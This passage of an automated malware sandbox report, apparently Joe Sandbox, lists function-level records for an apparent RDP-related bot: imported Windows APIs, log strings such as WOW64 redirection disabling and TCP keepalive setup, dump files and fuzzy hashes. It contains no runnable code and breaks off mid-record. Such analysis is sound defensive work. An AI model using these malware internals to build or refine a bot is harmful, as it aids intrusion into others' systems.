                  • Instruction Fuzzy Hash: 3C11E820F1D747C9FB16B714A8913B5A2646F41388FF440BAD80ECA2A1EE6DEE45C330
                  APIs
                    • Part of subcall function 00007FF76A901694: LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2
                    • Part of subcall function 00007FF76A901613: GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633
                  • GetLastError.KERNEL32 ref: 00007FF76A901760
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                  • API String ID: 1533789296-1853374401
                  • Opcode ID: cd1bc05b9ec3a23c4e34d08ce4e247aac6b91763abaec2c8ac2612d9e2c97bf4
                  • Instruction ID: 197dc74e6dd7c5993143771dd1551c2d8a31f11812d2ef1f88c5ae23b0a73352
                  • Opcode Fuzzy Hash: cd1bc05b9ec3a23c4e34d08ce4e247aac6b91763abaec2c8ac2612d9e2c97bf4
                  • Instruction Fuzzy Hash: 5D01E960F1DB07D9FB16B714A8913B4A6606F01388FF400BAD41EC62A1EF6DEE568330
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                  • API String ID: 1533789296-1853374401
                  • Opcode ID: 959520b5154ecb97bc209f2a5e3c0967861b68b6872db441ba1d49edeb65a9c6
                  • Instruction ID: edb98f2deff4a6a4699f9c9741db4aa4b79ba6319134d9e5ea9d70c8d579d529
                  • Opcode Fuzzy Hash: 959520b5154ecb97bc209f2a5e3c0967861b68b6872db441ba1d49edeb65a9c6
                  • Instruction Fuzzy Hash: 4E0121A0E1DD4394FB52D797EC903B9276A6F40360F8550BAD40E866B6FF6CE985C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
                  • String ID: Done$[I] (%s) -> %s$ebus_cleanup
                  • API String ID: 3198640931-3713968270
                  • Opcode ID: b145425d1acac5d6f063df52e29609869e864dbf6be9dad906aabba8e617ea69
                  • Instruction ID: 43752b88071c9262c05fc410146baa1ec9f2c0e04b72cd843a29b17ba79b6b6d
                  • Opcode Fuzzy Hash: b145425d1acac5d6f063df52e29609869e864dbf6be9dad906aabba8e617ea69
                  • Instruction Fuzzy Hash: 73019260A48E8280FB129B57E894378236BAB557B4FA043B6D83D462F0CF2DA545C301
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Sleep_amsg_exit$_initterm
                  • String ID:
                  • API String ID: 2193611136-0
                  • Opcode ID: 856a5a06293a3ecf417550f08644ae4fca005ea1389400e4a4827bbcc1fe1e40
                  • Instruction ID: ec879bf9f8097596251a3d31dfa87c3132a702965958a1f816e81e1c2eddb134
                  • Opcode Fuzzy Hash: 856a5a06293a3ecf417550f08644ae4fca005ea1389400e4a4827bbcc1fe1e40
                  • Instruction Fuzzy Hash: FA417121F0DE4286F7669B67E89037D329EAF547A4F5840B9DD4D873B1DE2CE9408342
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                  • API String ID: 2962429428-2428953624
                  • Opcode ID: 1be9b12f09bbff63a9c0c449d041de5bcf907d81c683f8985a037333a4f6a461
                  • Instruction ID: 6668dc402a5856cc6a68c2efc9ac0f69f5618d51ef5b03b0da911ea29f4ad16c
                  • Opcode Fuzzy Hash: 1be9b12f09bbff63a9c0c449d041de5bcf907d81c683f8985a037333a4f6a461
                  • Instruction Fuzzy Hash: B4F01C61A08D4B90FB11DBAAEC502A92719BF507A8F9941B3DD0E47674DE3CEA46C300
                  APIs
                  • FreeLibrary.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A90892F
                  • GetProcessHeap.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908962
                  • HeapFree.KERNEL32(?,?,00000000,000001DE38FB13D0,00007FF76A908CDE,?,?,?,?,?,?,00000001,00007FF76A908E4A,?,?,00007FF76A9184F8), ref: 00007FF76A908973
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: FreeHeap$LibraryProcessfflushfwrite
                  • String ID: [I] (%s) -> Done(name=%s)$units_cleanup
                  • API String ID: 1108967834-2645831314
                  • Opcode ID: e9e47ca765005b47a752e40d5b5feb42eb5ee7974852023ff9d37cefed71fc12
                  • Instruction ID: 45fc9d9c3b6c2032e812333bc90d074e4a8821646ad05cf6e050d31be619e7ec
                  • Opcode Fuzzy Hash: e9e47ca765005b47a752e40d5b5feb42eb5ee7974852023ff9d37cefed71fc12
                  • Instruction Fuzzy Hash: 8511EA65B0DB06C5FA59BB11E8442B8B3A0BF44B84FE484B9C95D873A0DE3CAD45D331
                  APIs
                  • fclose.MSVCRT ref: 00007FF76A909E53
                  • DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF76A9089B9,?,?,00000000,00007FF76A908CE3,?,?,?,?,?,?,00000001), ref: 00007FF76A909E80
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CriticalDeleteSectionfclose
                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                  • API String ID: 3387974148-4247581856
                  • Opcode ID: c4fcf39efeefee122eb95084b5db9d4973f73945639ccbcc38e9f30a82c878b1
                  • Instruction ID: 5697071cc3ba39e738d1c98c2d8273b7d9642f2ac329aec11816606efde07e5f
                  • Opcode Fuzzy Hash: c4fcf39efeefee122eb95084b5db9d4973f73945639ccbcc38e9f30a82c878b1
                  • Instruction Fuzzy Hash: 81F01D60E09743C8FA1ABB69E8A5370B2606F55748FF445F4C10CC61A0CF3C684AA770
                  APIs
                  • VirtualProtect.KERNEL32(?,?,00007FF76A9184F8,00000000,?,?,?,00007FF76A9184F0,00007FF76A901208,?,?,?,00007FF76A901313), ref: 00007FF76A90A4C7
                  Strings
                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF76A90A3F0
                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF76A90A462
                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF76A90A36D
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                  • API String ID: 544645111-1286557213
                  • Opcode ID: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                  • Instruction ID: 2b759928de90daf81709463ecf87a8ac8d14365c3910750e7188bbe3631d2cd2
                  • Opcode Fuzzy Hash: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                  • Instruction Fuzzy Hash: 1B51B062F08752C9FB10AB19D444278B3A1AB44BE8FA481B9D91DC7BC5DE3CE981C760
                  APIs
                  • VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE11512034,?,?,00007FFE1150119E), ref: 00007FFE1150D197
                  Strings
                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1150D132
                  • Unknown pseudo relocation bit size %d., xrefs: 00007FFE1150D0C0
                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1150D03D
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                  • API String ID: 544645111-1286557213
                  • Opcode ID: ca1dfa075a6876562fc164620a82b2737de82aab9a8b45a2298a9535492db545
                  • Instruction ID: 197a1a9de9aa4cac500f7cac1cf144364292ee5ca1c83450faa72b5f38669b4e
                  • Opcode Fuzzy Hash: ca1dfa075a6876562fc164620a82b2737de82aab9a8b45a2298a9535492db545
                  • Instruction Fuzzy Hash: 43518B62F08E4285EB20CBA6D95067D27A9AB41BF4F0482B9D91C477F9DE3DE582C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                  • API String ID: 1729277954-536111009
                  • Opcode ID: 078f60ad97f9412ac0ae0b04a1911b99cd0328628c0a8e5e7dd17e81b0a1bcc0
                  • Instruction ID: 46cfaaf03900a5ae26517651b408eca78f6406fce2df73ee3f9c35ccea089cdf
                  • Opcode Fuzzy Hash: 078f60ad97f9412ac0ae0b04a1911b99cd0328628c0a8e5e7dd17e81b0a1bcc0
                  • Instruction Fuzzy Hash: ECF0F061A0C90296E3509B67B8404A96669AB887B4F408275ED2D837F4DF3CC50A8B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorHandleLastModule
                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                  • API String ID: 4242514867-2427012484
                  • Opcode ID: 5eacd447ff954da9d85cf229d6cc2382b6146f4b768f5b19ce8662d7776913ca
                  • Instruction ID: f1d8a920d1ee08540b585f01076f5fc9812e9d8e8b94988c0de95e640d8333a4
                  • Opcode Fuzzy Hash: 5eacd447ff954da9d85cf229d6cc2382b6146f4b768f5b19ce8662d7776913ca
                  • Instruction Fuzzy Hash: CCF03021B08B02C0F721AB14E444369A760FB857DCFF400B6D55D82AA4DE3CD518C770
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorHandleLastModule
                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                  • API String ID: 4242514867-2427012484
                  • Opcode ID: e5e8753456e70cf3621af28bfa07c7a50d365ed87c29208ff22d9393e92c4bb1
                  • Instruction ID: e51a411dc8547ad62a3353eb60dc9b29f3a11f73acd5c19546a2570aec94f3ba
                  • Opcode Fuzzy Hash: e5e8753456e70cf3621af28bfa07c7a50d365ed87c29208ff22d9393e92c4bb1
                  • Instruction Fuzzy Hash: 9EF0C061E0CE4291EB219B66E8403AD3769FB44778F9401BAD54D426B8EF3CD249C751
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Byte$CharMultiWide$Lead_errno
                  • String ID:
                  • API String ID: 2766522060-0
                  • Opcode ID: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                  • Instruction ID: 8a2ebba3b83ecd53293231e73395a5d95647588790a6ca3b9a4e25f5793048a6
                  • Opcode Fuzzy Hash: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                  • Instruction Fuzzy Hash: B831C472A0C381C9F3716B25A84037DAA90AB967C8FA84179EA98837D5DB3CD9458721
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Byte$CharMultiWide$Lead_errno
                  • String ID:
                  • API String ID: 2766522060-0
                  • Opcode ID: 1a1b0acdbf6aa5c38bd153ef633c052549a54d5c047baae8f056b3c432a9561b
                  • Instruction ID: da2b32467234927e285b596978d5325579247d127e92f8e39c343e796344371f
                  • Opcode Fuzzy Hash: 1a1b0acdbf6aa5c38bd153ef633c052549a54d5c047baae8f056b3c432a9561b
                  • Instruction Fuzzy Hash: 4331C476B0CA818AE7724F33A40036D6A9AAB557A4F448275EA8C877F5DF3CE4458B01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: signal
                  • String ID: CCG
                  • API String ID: 1946981877-1584390748
                  • Opcode ID: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                  • Instruction ID: 7caf830854561543a3e0bd3b8fb0c0ea96f72787d292e7cb11da8dd041fef446
                  • Opcode Fuzzy Hash: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                  • Instruction Fuzzy Hash: 3E21C194E0C702C9FE783224984437CA091AF593E4FB88ABEC90DC7AD0DD1CE8C141B1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-3474627141
                  • Opcode ID: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                  • Instruction ID: e02593e06cba22872360ab42ae0545c11df1e83c68857b004274f02df365911d
                  • Opcode Fuzzy Hash: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                  • Instruction Fuzzy Hash: F6115461904F84C6E6119F1CD4413EAB370FF9E399FA05325EBCC56624DF39D5528B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
                  • Instruction ID: 5b55ca0a7bcb1f02f981a854c9d603bb88d67012526e7411758e29a7a547d3eb
                  • Opcode Fuzzy Hash: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
                  • Instruction Fuzzy Hash: 95F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
                  • Instruction ID: fd6f6d172eb28c296f03119df2856448c40dd7530e2a0e32bb0bec3b6a21dc34
                  • Opcode Fuzzy Hash: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
                  • Instruction Fuzzy Hash: E6F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
